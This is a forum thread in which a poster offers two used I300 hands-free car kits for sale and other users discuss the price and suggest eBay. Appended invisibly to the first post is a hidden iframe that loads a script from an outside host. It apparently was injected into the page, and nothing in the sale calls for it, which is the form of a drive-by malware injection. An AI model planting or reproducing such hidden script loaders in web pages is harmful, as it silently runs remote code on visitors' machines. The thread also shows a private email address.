+ Reply to Thread

I300 car kit for sale

Well ive done it! i turned in my I300 for the Treo 300. dont get me wrong the I300 was great except for the transmiter. i replaced 4 of them i 5 months and still could not get one to work right. now i have 2 in car speaker phone kits for sale one used but in great condition and one still in the box. we got 2 for the company and only installed one. this is the hands free kit that installes in the car with ext speaker and mic and a cradle and let me tell you it works great!!

we payed 400.00 each new and now they are selling for 120.00 plus shipping. i will sell the used one for 75.00 plus shipping and the in box unit for 100.00 plus shipping send me an email to sgriffith1@comcast.net if interested<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: I300 car kit for sale

Originally posted by sgriffith
    Well ive done it! i turned in my I300 for the Treo 300. dont get me wrong the I300 was great except for the transmiter. i replaced 4 of them i 5 months and still could not get one to work right. now i have 2 in car speaker phone kits for sale one used but in great condition and one still in the box. we got 2 for the company and only installed one. this is the hands free kit that installes in the car with ext speaker and mic and a cradle and let me tell you it works great!!

we payed 400.00 each new and now they are selling for 120.00 plus shipping. i will sell the used one for 75.00 plus shipping and the in box unit for 100.00 plus shipping send me an email to sgriffith1@comcast.net if interested
    I guess you got rob there with the car kit for 400 dollars each.
    ouchhhh

That was when they first came out and it was an ok price back then. you always have to pay more when an item is first on the market. but now i do not have the I300 any more so i am selling the car kits.

Just sell them both on Ebay, I got 71 for mine.

http://cgi.ebay.com/ws/eBayISAPI.dll...tem=1376885970